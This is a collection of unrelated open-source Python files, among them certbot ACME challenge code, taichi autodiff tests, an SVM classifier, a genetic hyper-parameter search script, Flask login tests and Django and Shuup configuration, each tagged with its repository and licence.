:returns: This challenge wrapped in `.JWS`
:rtype: .JWS
"""
return jose.JWS.sign(
payload=self.json_dumps(sort_keys=True).encode('utf-8'),
key=account_key, alg=alg, **kwargs)
def check_validation(self, validation, account_public_key):
"""Check validation.
:param JWS validation:
:param JWK account_public_key:
:rtype: bool
"""
if not validation.verify(key=account_public_key):
return False
try:
return self == self.json_loads(
validation.payload.decode('utf-8'))
except jose.DeserializationError as error:
logger.debug("Checking validation for DNS failed: %s", error)
return False
def gen_response(self, account_key, **kwargs):
"""Generate response.
:param .JWK account_key: Private account key.
:param .JWA alg:
:rtype: DNSResponse
"""
return DNSResponse(validation=self.gen_validation(
account_key, **kwargs))
def validation_domain_name(self, name):
"""Domain name for TXT validation record.
:param unicode name: Domain name being validated.
"""
return "{0}.{1}".format(self.LABEL, name)
@ChallengeResponse.register
class DNSResponse(ChallengeResponse):
"""ACME "dns" challenge response.
:param JWS validation:
"""
typ = "dns"
validation = jose.Field("validation", decoder=jose.JWS.from_json)
def check_validation(self, chall, account_public_key):
"""Check validation.
:param challenges.DNS chall:
:param JWK account_public_key:
:rtype: bool
"""
return chall.check_validation(self.validation, account_public_key)
| jtl999/certbot | acme/acme/challenges.py | Python | apache-2.0 | 18,834 |
# -*- coding: utf-8 -*-
# Copyright © 2014-2018 GWHAT Project Contributors
# https://github.com/jnsebgosselin/gwhat
#
# This file is part of GWHAT (Ground-Water Hydrograph Analysis Toolbox).
# Licensed under the terms of the GNU General Public License.
# Standard library imports :
import platform
# Third party imports :
from PyQt5.QtGui import QIcon, QFont, QFontDatabase
from PyQt5.QtCore import QSize
class StyleDB(object):
def __init__(self):
# ---- frame
self.frame = 22
self.HLine = 52
self.VLine = 53
self.sideBarWidth = 275
# ----- colors
self.red = '#C83737'
self.lightgray = '#E6E6E6'
self.rain = '#0000CC'
self.snow = '0.7'
self.wlvl = '#0000CC' # '#000099'
if platform.system() == 'Windows':
self.font1 = QFont('Segoe UI', 11) # Calibri, Cambria
self.font_console = QFont('Segoe UI', 9)
self.font_menubar = QFont('Segoe UI', 10)
elif platform.system() == 'Linux':
self.font1 = QFont('Ubuntu', 11)
self.font_console = QFont('Ubuntu', 9)
self.font_menubar = QFont('Ubuntu', 10)
# database = QFontDatabase()
# print database.families()
if platform.system() == 'Windows':
self.fontfamily = "Segoe UI" # "Cambria" #"Calibri" #"Segoe UI""
elif platform.system() == 'Linux':
self.fontfamily = "Ubuntu"
# self.fontSize1.setPointSize(11)
# 17 = QtGui.QFrame.Box | QtGui.QFrame.Plain
# 22 = QtGui.QFrame.StyledPanel | QtGui.QFrame.Plain
# 20 = QtGui.QFrame.HLine | QtGui.QFrame.Plain
# 52 = QtGui.QFrame.HLine | QtGui.QFrame.Sunken
# 53 = QtGui.QFrame.VLine | QtGui.QFrame.Sunken
| jnsebgosselin/WHAT | gwhat/common/styles.py | Python | gpl-3.0 | 1,792 |
from taichi.lang import impl
from taichi.lang.misc import get_host_arch_list
import taichi as ti
from tests import test_utils
@test_utils.test(require=ti.extension.adstack)
def test_ad_if_simple():
x = ti.field(ti.f32, shape=())
y = ti.field(ti.f32, shape=())
ti.root.lazy_grad()
@ti.kernel
def func():
if x[None] > 0.:
y[None] = x[None]
x[None] = 1
y.grad[None] = 1
func()
func.grad()
assert x.grad[None] == 1
@test_utils.test(require=ti.extension.adstack)
def test_ad_if():
x = ti.field(ti.f32, shape=2)
y = ti.field(ti.f32, shape=2)
ti.root.lazy_grad()
@ti.kernel
def func(i: ti.i32):
if x[i] > 0:
y[i] = x[i]
else:
y[i] = 2 * x[i]
x[0] = 0
x[1] = 1
y.grad[0] = 1
y.grad[1] = 1
func(0)
func.grad(0)
func(1)
func.grad(1)
assert x.grad[0] == 2
assert x.grad[1] == 1
@test_utils.test(require=ti.extension.adstack)
def test_ad_if_nested():
n = 20
x = ti.field(ti.f32, shape=n)
y = ti.field(ti.f32, shape=n)
z = ti.field(ti.f32, shape=n)
ti.root.lazy_grad()
@ti.kernel
def func():
for i in x:
if x[i] < 2:
if x[i] == 0:
y[i] = 0
else:
y[i] = z[i] * 1
else:
if x[i] == 2:
y[i] = z[i] * 2
else:
y[i] = z[i] * 3
z.fill(1)
for i in range(n):
x[i] = i % 4
func()
for i in range(n):
assert y[i] == i % 4
y.grad[i] = 1
func.grad()
for i in range(n):
assert z.grad[i] == i % 4
@test_utils.test(require=ti.extension.adstack)
def test_ad_if_mutable():
x = ti.field(ti.f32, shape=2)
y = ti.field(ti.f32, shape=2)
ti.root.lazy_grad()
@ti.kernel
def func(i: ti.i32):
t = x[i]
if t > 0:
y[i] = t
else:
y[i] = 2 * t
x[0] = 0
x[1] = 1
y.grad[0] = 1
y.grad[1] = 1
func(0)
func.grad(0)
func(1)
func.grad(1)
assert x.grad[0] == 2
assert x.grad[1] == 1
@test_utils.test(require=ti.extension.adstack)
def test_ad_if_parallel():
x = ti.field(ti.f32, shape=2)
y = ti.field(ti.f32, shape=2)
ti.root.lazy_grad()
@ti.kernel
def func():
for i in range(2):
t = x[i]
if t > 0:
y[i] = t
else:
y[i] = 2 * t
x[0] = 0
x[1] = 1
y.grad[0] = 1
y.grad[1] = 1
func()
func.grad()
assert x.grad[0] == 2
assert x.grad[1] == 1
@test_utils.test(require=[ti.extension.adstack, ti.extension.data64],
default_fp=ti.f64)
def test_ad_if_parallel_f64():
x = ti.field(ti.f64, shape=2)
y = ti.field(ti.f64, shape=2)
ti.root.lazy_grad()
@ti.kernel
def func():
for i in range(2):
t = x[i]
if t > 0:
y[i] = t
else:
y[i] = 2 * t
x[0] = 0
x[1] = 1
y.grad[0] = 1
y.grad[1] = 1
func()
func.grad()
assert x.grad[0] == 2
assert x.grad[1] == 1
@test_utils.test(require=ti.extension.adstack)
def test_ad_if_parallel_complex():
x = ti.field(ti.f32, shape=2)
y = ti.field(ti.f32, shape=2)
ti.root.lazy_grad()
@ti.kernel
def func():
ti.parallelize(1)
for i in range(2):
t = 0.0
if x[i] > 0:
t = 1 / x[i]
y[i] = t
x[0] = 0
x[1] = 2
y.grad[0] = 1
y.grad[1] = 1
func()
func.grad()
assert x.grad[0] == 0
assert x.grad[1] == -0.25
@test_utils.test(require=[ti.extension.adstack, ti.extension.data64],
default_fp=ti.f64)
def test_ad_if_parallel_complex_f64():
x = ti.field(ti.f64, shape=2)
y = ti.field(ti.f64, shape=2)
ti.root.lazy_grad()
@ti.kernel
def func():
ti.parallelize(1)
for i in range(2):
t = 0.0
if x[i] > 0:
t = 1 / x[i]
y[i] = t
x[0] = 0
x[1] = 2
y.grad[0] = 1
y.grad[1] = 1
func()
func.grad()
assert x.grad[0] == 0
assert x.grad[1] == -0.25
@test_utils.test(arch=get_host_arch_list())
def test_stack():
@ti.kernel
def func():
impl.call_internal("test_stack")
func()
| yuanming-hu/taichi | tests/python/test_ad_if.py | Python | mit | 4,447 |
"""
twiki.wikipedia
~~~~~~~~~~~~~~~
Wikipedia API wrapper
"""
import wikipedia
class WikipediaError(Exception):
def __init__(self, msg, code=500):
self.msg = msg
self.code = code
super(WikipediaError, self).__init__(msg, code)
class Wikipedia(object):
"""Wraps around wikipedia API wrapper for ease of use in stripping down
massive wikipedia pages to basic information and for easier error handling
"""
def __init__(self, wikipedia=wikipedia):
self._wikipedia = wikipedia
def search(self, term):
"Finds wikipedia page titles and returns dictionaries of title and url."
return [self._build_basic_info(title) for title in self._search(term)]
def get_page(self, title):
"""Finds a wikipedia page and returns a dictionary of title, url and
shortened summary.
"""
return self._transform_page(self._get_page(title))
def _search(self, term):
"Attempts to search wikipedia for potentially matching pages"
try:
return self._wikipedia.search(term)
except wikipedia.WikipediaException as e:
self._throw_from_wikipedia_error(e, "Sorry, we're having trouble with Wikipedia right now.")
def _build_basic_info(self, title):
return {'title': title, 'url': self._build_url(title)}
def _get_page(self, title):
"""Attempts to retrieve a fully wikipedia page and throws a WikipediaError
if it can't."""
try:
return self._wikipedia.page(title)
except wikipedia.DisambiguationError as e:
self._throw_from_wikipedia_error(e, "This is a disambiguation page", 301)
except wikipedia.WikipediaException as e:
self._throw_from_wikipedia_error(e, "Couldn't find wikipedia page")
def _transform_page(self, page):
summary = self._shorten_summary(page.summary)
return {'title': page.title, 'summary': summary, 'url': page.url}
@staticmethod
def _shorten_summary(summary, word_limit=25):
"""Shortens a potentially long summary into a shorter summary."""
if summary.count(' ') <= word_limit:
return summary
else:
cut_off_summary = summary.split()[:word_limit]
return '{0} ...'.format(' '.join(cut_off_summary))
@staticmethod
def _build_url(title):
url = 'https://www.wikipedia.org/wiki/{0}'
return url.format(title.replace(' ', '_'))
@staticmethod
def _throw_from_wikipedia_error(e, msg=None, code=500):
"""Raises an application specific error from either the provided message
or the error passed to it
"""
if msg is None:
msg = e.error
raise WikipediaError(msg, code)
| justanr/twiki | twiki/wiki.py | Python | mit | 2,785 |
# coding: utf-8
"""
OpenAPI spec version:
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class V1ImageStreamImportStatus(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
operations = [
]
# The key is attribute name
# and the value is attribute type.
swagger_types = {
'_import': 'V1ImageStream',
'repository': 'V1RepositoryImportStatus',
'images': 'list[V1ImageImportStatus]'
}
# The key is attribute name
# and the value is json key in definition.
attribute_map = {
'_import': 'import',
'repository': 'repository',
'images': 'images'
}
def __init__(self, _import=None, repository=None, images=None):
"""
V1ImageStreamImportStatus - a model defined in Swagger
"""
self.__import = _import
self._repository = repository
self._images = images
@property
def _import(self):
"""
Gets the _import of this V1ImageStreamImportStatus.
Import is the image stream that was successfully updated or created when 'to' was set.
:return: The _import of this V1ImageStreamImportStatus.
:rtype: V1ImageStream
"""
return self.__import
@_import.setter
def _import(self, _import):
"""
Sets the _import of this V1ImageStreamImportStatus.
Import is the image stream that was successfully updated or created when 'to' was set.
:param _import: The _import of this V1ImageStreamImportStatus.
:type: V1ImageStream
"""
self.__import = _import
@property
def repository(self):
"""
Gets the repository of this V1ImageStreamImportStatus.
Repository is set if spec.repository was set to the outcome of the import
:return: The repository of this V1ImageStreamImportStatus.
:rtype: V1RepositoryImportStatus
"""
return self._repository
@repository.setter
def repository(self, repository):
"""
Sets the repository of this V1ImageStreamImportStatus.
Repository is set if spec.repository was set to the outcome of the import
:param repository: The repository of this V1ImageStreamImportStatus.
:type: V1RepositoryImportStatus
"""
self._repository = repository
@property
def images(self):
"""
Gets the images of this V1ImageStreamImportStatus.
Images is set with the result of importing spec.images
:return: The images of this V1ImageStreamImportStatus.
:rtype: list[V1ImageImportStatus]
"""
return self._images
@images.setter
def images(self, images):
"""
Sets the images of this V1ImageStreamImportStatus.
Images is set with the result of importing spec.images
:param images: The images of this V1ImageStreamImportStatus.
:type: list[V1ImageImportStatus]
"""
self._images = images
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(V1ImageStreamImportStatus.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| detiber/lib_openshift | lib_openshift/models/v1_image_stream_import_status.py | Python | apache-2.0 | 5,152 |
import numpy as np
from AbstractClassifier import AbstractClassfier
class Svm(AbstractClassfier):
def __init__(self):
self._w = np.array([])
self._mins = np.array([])
self._maxs = np.array([])
self.false_positive_loss = 1
self.false_negative_loss = 1
self.error = 0
self.simple_error = 0
def _sub_gradient_loss(self, example, W, c, n):
(x, y) = example[:-1], example[-1]
grad_loss = W / n
if 1 - self._loss_value(y)*y * W.dot(x) > 0:
grad_loss -= c*self._loss_value(y)*y * x
return grad_loss
def _loss_value(self, y):
return self.false_negative_loss if y == 1 else self.false_positive_loss
def _svm_c(self, examples, c, epoch):
"""
:param examples:
:param c:
:return:
"""
num_ex = examples.shape[0]
alpha = 1
w_vec = np.zeros(examples.shape[1]-1)
t = 0
for _ in range(epoch * num_ex):
r = examples[np.random.randint(num_ex)]
t += 1
w_vec -= alpha/t * self._sub_gradient_loss(r, w_vec, c, num_ex)
return w_vec
def learn(self, examples, c_arr=None, epoch=3, learning_part=0.7, cross_validation_times=5):
"""
:param learning_part:
:param examples:
:param cross_validation_times:
:param epoch:
:param x_mat: Vector X of vectors of features
:param y_vec:
:param c_arr:
"""
if c_arr is None:
c_arr = 2**np.arange(-5, 16, 2.0)
n = examples.shape[0]
middle = round(n*learning_part) if learning_part > 0 else -1
# normalize
x_mat = examples[:, :-1]
mins = x_mat.min(axis=0)
maxs = x_mat.max(axis=0) - mins
x_mat[:] = (x_mat - mins) / maxs
c_len = c_arr.shape[0]
errors = np.zeros(c_len)
for j in range(c_len):
c = c_arr[j]
error = 0
for _ in range(cross_validation_times):
shuffled = np.random.permutation(examples)
learnings, testings = np.split(shuffled, [middle])
w_vec = self._svm_c(learnings, c, epoch)
error = sum([(r[-1] * w_vec.dot(r[:-1]) < 0) * self._loss_value(r[-1]) for r in testings])
errors[j] += error/testings.shape[0]
errors /= cross_validation_times
result_c = c_arr[np.argmin(errors)]
w_vec = self._svm_c(examples, result_c, epoch)
#ending
self._w = w_vec
self._mins = mins
self._maxs = maxs
self.error = sum([(r[-1] * w_vec.dot(r[:-1]) < 0) * self._loss_value(r[-1]) for r in examples]) / n
self.simple_error = sum([(r[-1] * w_vec.dot(r[:-1]) < 0) for r in examples]) / n
def to_list(self):
return [self._w, self._mins, self._maxs, self.error, self.simple_error]
def from_list(self, list_):
if len(list_) != 5:
raise ValueError('from_list: len(list_) has to be 5')
self._w, self._mins, self._maxs, self.error, self.simple_error = list_
def classify(self, x):
return self._w.dot((x - self._mins) / self._maxs) > 0
def classify_vec(self, vec, axis=-1):
return np.apply_along_axis(self.classify, axis, vec)
def valuefy(self, x):
return self._w.dot((x - self._mins) / self._maxs)
def valuefy_vec(self, vec, axis=-1):
return np.apply_along_axis(self.valuefy, axis, vec)
| zardav/FaceDetection | FaceDetection/Svm.py | Python | gpl-3.0 | 3,493 |
#!/bin/sh
''''exec python3 -u -- "$0" ${1+"$@"} # '''
# #! /usr/bin/env python3
# Copyright 2016 Euclidean Technologies Management LLC All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import os
import sys
import copy
import subprocess
import math
import numpy as np
import regex as re
import pandas as pd
import argparse as ap
import random
import configs as configurations
import pickle
_SHELL = '/bin/sh'
_VALID_ERR_IDX = 7
def get_search_configs():
"""
Defines the configurations for hyper parameter search
"""
configurations.DEFINE_string("template",None,"Template file for hyper-param search")
configurations.DEFINE_string("search_algorithm","genetic","Algorithm for hyper-param optimization. Select from 'genetic', 'grid_search'")
configurations.DEFINE_integer("generations",100,"Number of generations for genetic algorithm")
configurations.DEFINE_integer("pop_size",20,"Population size for genetic algorithm")
configurations.DEFINE_integer("num_survivors",10,"Number of survivors for genetic algorithm")
configurations.DEFINE_integer("num_threads",4,"NUmber of parallel threads (Number of parallel executions)")
configurations.DEFINE_integer("num_gpu",1,"Number of GPU on the machine, Use 0 if there are None")
configurations.DEFINE_integer("sleep_time",1,"Sleep time")
configurations.DEFINE_float("mutate_rate",0.2,"Mutation rate for genetic algorithm")
configurations.DEFINE_string("init_pop",None,"Specify starting population. Path to the pickle file")
c = configurations.ConfigValues()
return c
def get_name(gen,i):
d1 = max(6,len(str(gen)))
d2 = max(6,len(str(i)))
fmt = 'gen-%0'+str(d1)+'d-mem-%0'+str(d2)+'d';
return fmt%(gen,i);
def output_filename(gen,i):
name = get_name(gen,i)
filename = "output/stdout-%s.txt"%name
return filename
def config_filename(gen,i):
name = get_name(gen,i)
return "%s.conf"%name
def donefile_filename(gen,thread):
return "output/done-g%04d-u%03d.txt"%(gen,thread)
def script_filename(gen,thread):
dirname = 'scripts'
basename = dirname + "/train-g%04d"%gen
scriptname = basename + "-u%03d.sh"%thread
return scriptname
def serialize_member(mem):
str = ""
for el in sorted(mem):
if el != '--name' and el != '--model_dir':
str += ':' + mem[el][0]
return str
def generate_results_test(pop,gen):
result = list()
for i in range(len(pop)):
str = serialize_member(pop[i])
seed = hash(str)
random.seed(seed)
result.append(random.random())
return result
def generate_results(pop,gen):
result = list()
for i in range(len(pop)):
filename = output_filename(gen,i)
print("Reading file "+filename)
with open(filename) as f:
content = f.readlines()
content = [x.strip() for x in content]
# remove lines w/o error
try:
content = [s for s in content if re.search('MSE_w_variance',s)]
errors = [float(s.split()[_VALID_ERR_IDX]) for s in content]
assert len(content) > 0
except AssertionError:
content = [s for s in content if re.search('Valid LOSS',s)]
errors = [float(s.split()[-1]) for s in content]
if len(errors) > 0:
errors.sort()
result.append(errors[0])
else:
result.append(float('inf'))
if result[-1] == 'nan':
result[-1] = float('inf')
print("-"*80)
print(result)
assert(len(pop) == len(result))
return result
def poll_for_done(pop,gen):
not_done = True
while(not_done):
        time.sleep(_SLEEP_TIME)
num_done = 0
for thread in range(_NUM_THREADS):
if os.path.isfile(donefile_filename(gen,thread)):
num_done += 1
if num_done == _NUM_THREADS:
not_done = False
def execute_train_scripts(pop,gen):
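    # Launch every per-thread training script in the background via a single
    # shell command; completion is detected later by polling the per-thread
    # done-files.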
str = ""
for thread in range(_NUM_THREADS):
str += script_filename(gen,thread) + " & "
os.system(str)
def create_train_scripts(pop,gen):
dirname = 'scripts'
if os.path.isdir(dirname) is False:
os.makedirs(dirname)
if os.path.isdir('output') is False:
os.makedirs('output')
if os.path.isdir('chkpts') is False:
os.makedirs('chkpts')
for thread in range(_NUM_THREADS):
scriptname = script_filename(gen,thread)
with open(scriptname,"w") as f:
print("#!%s"%_SHELL,file=f)
assert(len(pop)%_NUM_THREADS==0)
m = len(pop)//_NUM_THREADS
pop_idxs = [thread*m + i for i in range(m)]
for i in pop_idxs:
id_seed = int(17*gen + i)
# Add GPU number to the members of the generation
if _NUM_GPU!=0:
str = "CUDA_VISIBLE_DEVICES=%d"%(thread%_NUM_GPU)
elif _NUM_GPU==0:
str = "CUDA_VISIBLE_DEVICES=''"
str += " /home/lchauhan/deep-quant/scripts/deep_quant.py"
str += " --config=config/"+config_filename(gen,i)
#str += " --seed=%i"%id_seed
str += " --UQ=True"
str += " --cache_id=%i"%id_seed
str += " > " + output_filename(gen,i)
str += " 2> output/stderr-%s.txt"%get_name(gen,i)
#str += "; rm -rf chkpts/chkpts-%s"%get_name(gen,i)+";"
print(str,file=f)
donefile = donefile_filename(gen,thread)
print("echo 'done.' > %s"%donefile,file=f)
f.closed
os.system("chmod +x %s"%scriptname)
def write_population_configs(pop,gen):
dirname = 'config'
if os.path.isdir(dirname) is not True:
os.makedirs(dirname)
for i in range(len(pop)):
filename = dirname + '/' + config_filename(gen,i)
configs = pop[i]
configs['--model_dir'][0] = "chkpts/chkpts-%s"%get_name(gen,i)
with open(filename,"w") as f:
for flag in sorted(configs):
print("%-30s %s"%(flag,configs[flag][0]),file=f)
f.closed
def train_population(pop,gen):
""" Train the population
Args:
pop is a population
gen is the generation number (id)
Returns:
An array of performance/error for each pop member
"""
assert(type(pop) is list)
write_population_configs(pop,gen)
create_train_scripts(pop,gen)
execute_train_scripts(pop,gen)
poll_for_done(pop,gen)
result = generate_results(pop,gen)
#result = generate_results_test(pop,gen)
return result
def calc_diversity(pop):
mems = [serialize_member(m) for m in pop]
count = float(len(mems))
uniq = float(len(set(mems)))
assert(count > 0)
return uniq/count
def swap(items,i,j):
""" Swap two items in a list
"""
assert(type(items) is list)
tmp = items[i]
items[i] = items[j]
items[j] = tmp
def randomize(mem):
""" Radomize a population memeber
Args: A member of a pop (dict of lists)
"""
assert(type(mem) is dict)
for flag in mem:
items = mem[flag]
if len(items) > 1:
i = random.randrange(0,len(items))
swap(items,0,i)
def mutate(mem):
""" Mutate a population memeber
Args: A member of a pop (dict of lists)
"""
assert(type(mem) is dict)
# get flags that have more than one element
flags = [f for f in mem if len(mem[f]) > 1]
# randomly choose one
random.shuffle(flags)
flag = flags[0]
# mutate it
i = random.randrange(1,len(mem[flag]))
before = mem[flag][0]
before_s = serialize_member(mem)
swap(mem[flag],0,i)
after = mem[flag][0]
after_s = serialize_member(mem)
print("mutation: %s: %s -> %s"%(flag,before,after))
print("BE "+before_s)
print("AF "+after_s)
def init_population(config):
""" Initialize a population
Args: config
Returns: population
"""
pop = list()
for i in range(_POP_SIZE):
mem = copy.deepcopy(config)
randomize(mem)
mem['--name'] = list()
mem['--name'].append(get_name(1,i))
str = serialize_member(mem)
print("IN %s %s"%(str,hash(str)))
pop.append(mem)
return pop
def cross_parents(mom,dad,child_name='none'):
assert(type(mom) is dict)
assert(type(dad) is dict)
child = dict()
for flag in mom:
assert(type(mom[flag]) is list)
assert(type(dad[flag]) is list)
items = mom[flag] if random.random() > 0.5 else dad[flag]
child[flag] = items[:] # ensure a copy
child['--name'][0] = child_name
print("Crossing (1) x (2) = (3)")
print("1: " + serialize_member(mom))
print("2: " + serialize_member(dad))
print("3: " + serialize_member(child))
return child
def get_next_generation(pop, gen, results):
assert(type(pop) is list)
assert(type(results) is list)
assert(len(pop) == len(results))
combined = list(zip(results,pop))
# lowest values are at top of list
print('-'*80)
#print(type(combined))
#print(type(combined[0][0]))
#print(type(combined[0][1]))
combined.sort(key=lambda tup: tup[0])
new_best = combined[0]
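    # Elitist selection: keep only the _NUM_SURVIVORS lowest-error members as
    # parents for the next generation.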
survivors = [combined[i][1] for i in range(_NUM_SURVIVORS)]
new_pop = list()
for i in range(_POP_SIZE):
# cross two suvivors
random.shuffle(survivors)
mom = survivors[0]
dad = survivors[1]
child = cross_parents(mom,dad,child_name=get_name(gen+1,i))
# mutations
if random.random() <= _MUTATE_RATE:
mutate(child)
new_pop.append(child)
return new_pop, new_best
def parse_config(filename):
with open(filename) as f:
content = f.readlines()
# remove whitespace characters like `\n` at the end of each line
# and remove empty lines
content = [x.strip() for x in content if len(x)]
config = dict()
for i in range(len(content)):
elements = content[i].split()
flag = elements.pop(0)
config[flag] = elements
return config
def execute_genetic_search(args):
config_filename = args.template
# config is a dict of lists
config = parse_config(config_filename)
random.seed(config['--seed'][0])
print("Seaching on the following configs:")
for flag in config:
if (len(config[flag]) > 1):
print(" %s -> (%s)"%(flag,','.join(config[flag])))
results = [float('inf')]*_POP_SIZE
# Read user specified or latest population
if args.init_pop:
pop = pickle.load(open(str(args.init_pop),"rb"))
else:
pop = init_population(config)
best = None
for i in range(_GENERATIONS):
gen = i+1
# Save the latest generation
dir = "_latest_pop"
if not os.path.exists(dir):
os.makedirs(dir)
pickle.dump(pop,open("_latest_pop/latest_pop.pkl","wb"))
result = train_population(pop,gen)
diversity = calc_diversity(pop)
(pop,new_best) = get_next_generation(pop,gen,result)
if best is None or best[0] > new_best[0]:
best = new_best
best_name = best[1]['--name'][0]
error = float(best[0])
print("Generation: %s Best: %s Error: %.4f Diversity: %3d%%"%(gen,best_name,error,int(100*diversity)))
sys.stdout.flush()
def get_all_config_permutations(src,tbl,i,allperms):
flags = [f for f in sorted(src)]
if i == len(flags):
allperms.append(tbl)
else:
flag = flags[i]
curr = src[flag]
for param in curr:
new_tbl = tbl.copy()
new_tbl[flag] = [param]
get_all_config_permutations(src,new_tbl,i+1,allperms)
def execute_grid_search(args):
config_filename = args.template
# config is a dict of lists
config = parse_config(config_filename)
allperms = list()
tbl = dict()
get_all_config_permutations(config,tbl,0,allperms)
train_population(allperms,0)
def main():
config_search_args = get_search_configs()
# Define Global Variables
global _GENERATIONS
global _POP_SIZE
global _NUM_SURVIVORS
global _NUM_THREADS
global _NUM_GPU
global _SLEEP_TIME
global _MUTATE_RATE
_GENERATIONS = config_search_args.generations
_POP_SIZE = config_search_args.pop_size
_NUM_SURVIVORS = config_search_args.num_survivors
_NUM_THREADS = config_search_args.num_threads
_NUM_GPU = config_search_args.num_gpu
_SLEEP_TIME = config_search_args.sleep_time
_MUTATE_RATE = config_search_args.mutate_rate
if config_search_args.search_algorithm == 'genetic':
execute_genetic_search(config_search_args)
elif config_search_args.search_algorithm == 'grid_search':
execute_grid_search(config_search_args)
else:
print("No search algorithm specified. Selecting default = genetic")
execute_genetic_search(config_search_args)
if __name__ == "__main__":
main()
| euclidjda/deep-quant | scripts/hyper_param_search_uq.py | Python | mit | 13,692 |
# -*- coding: utf-8 -*-
"""Functional tests using WebTest.
See: http://webtest.readthedocs.org/
"""
import pytest
from flask import url_for
from nostra.models.user import User
from .factories import UserFactory
class TestLoggingIn:
def test_can_log_in_returns_200(self, user, testapp):
# Goes to homepage
res = testapp.get("/")
# Fills out login form in navbar
form = res.forms['loginForm']
form['username'] = user.username
form['password'] = 'myprecious'
# Submits
res = form.submit().follow()
assert res.status_code == 200
def test_sees_alert_on_log_out(self, user, testapp):
res = testapp.get("/")
# Fills out login form in navbar
form = res.forms['loginForm']
form['username'] = user.username
form['password'] = 'myprecious'
# Submits
res = form.submit().follow()
res = testapp.get(url_for('public.logout')).follow()
# sees alert
assert 'You are logged out.' in res
def test_sees_error_message_if_password_is_incorrect(self, user, testapp):
# Goes to homepage
res = testapp.get("/")
# Fills out login form, password incorrect
form = res.forms['loginForm']
form['username'] = user.username
form['password'] = 'wrong'
# Submits
res = form.submit()
# sees error
assert "Invalid password" in res
def test_sees_error_message_if_username_doesnt_exist(self, user, testapp):
# Goes to homepage
res = testapp.get("/")
# Fills out login form, password incorrect
form = res.forms['loginForm']
form['username'] = 'unknown'
form['password'] = 'myprecious'
# Submits
res = form.submit()
# sees error
assert "Unknown user" in res
class TestRegistering:
def test_can_register(self, user, testapp):
old_count = len(User.query.all())
# Goes to homepage
res = testapp.get("/")
# Clicks Create Account button
res = res.click("Create account")
# Fills out the form
form = res.forms["registerForm"]
form['username'] = 'foobar'
form['email'] = '[email protected]'
form['password'] = 'secret'
form['confirm'] = 'secret'
# Submits
res = form.submit().follow()
assert res.status_code == 200
# A new user was created
assert len(User.query.all()) == old_count + 1
def test_sees_error_message_if_passwords_dont_match(self, user, testapp):
# Goes to registration page
res = testapp.get(url_for("public.register"))
# Fills out form, but passwords don't match
form = res.forms["registerForm"]
form['username'] = 'foobar'
form['email'] = '[email protected]'
form['password'] = 'secret'
form['confirm'] = 'secrets'
# Submits
res = form.submit()
# sees error message
assert "Passwords must match" in res
def test_sees_error_message_if_user_already_registered(self, user, testapp):
user = UserFactory(active=True) # A registered user
user.save()
# Goes to registration page
res = testapp.get(url_for("public.register"))
# Fills out form, but username is already registered
form = res.forms["registerForm"]
form['username'] = user.username
form['email'] = '[email protected]'
form['password'] = 'secret'
form['confirm'] = 'secret'
# Submits
res = form.submit()
# sees error
assert "Username already registered" in res
| jamesbbaker96/nostra | tests/test_functional.py | Python | bsd-3-clause | 3,658 |
# -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2016, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns(
'',
url('^saved-carts/$', views.CartListView.as_view(),
name='saved_cart.list'),
url('^saved-carts/save/$', views.CartSaveView.as_view(),
name='saved_cart.save'),
url('^saved-carts/(?P<pk>\d+)/add/$', views.CartAddAllProductsView.as_view(),
name='saved_cart.add_all'),
url('^saved-carts/(?P<pk>\d+)/delete/$', views.CartDeleteView.as_view(),
name='saved_cart.delete'),
url('^saved-carts/(?P<pk>.+)/$', views.CartDetailView.as_view(),
name='saved_cart.detail')
)
| hrayr-artunyan/shuup | shuup/front/apps/saved_carts/urls.py | Python | agpl-3.0 | 859 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('api', '0048_auto_20150406_1922'),
]
operations = [
migrations.AddField(
model_name='account',
name='accept_friend_requests',
field=models.NullBooleanField(verbose_name='Accept friend requests'),
preserve_default=True,
),
]
| SchoolIdolTomodachi/SchoolIdolAPI | api/migrations/0049_account_accept_friend_requests.py | Python | apache-2.0 | 479 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2010 Openstack, LLC.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
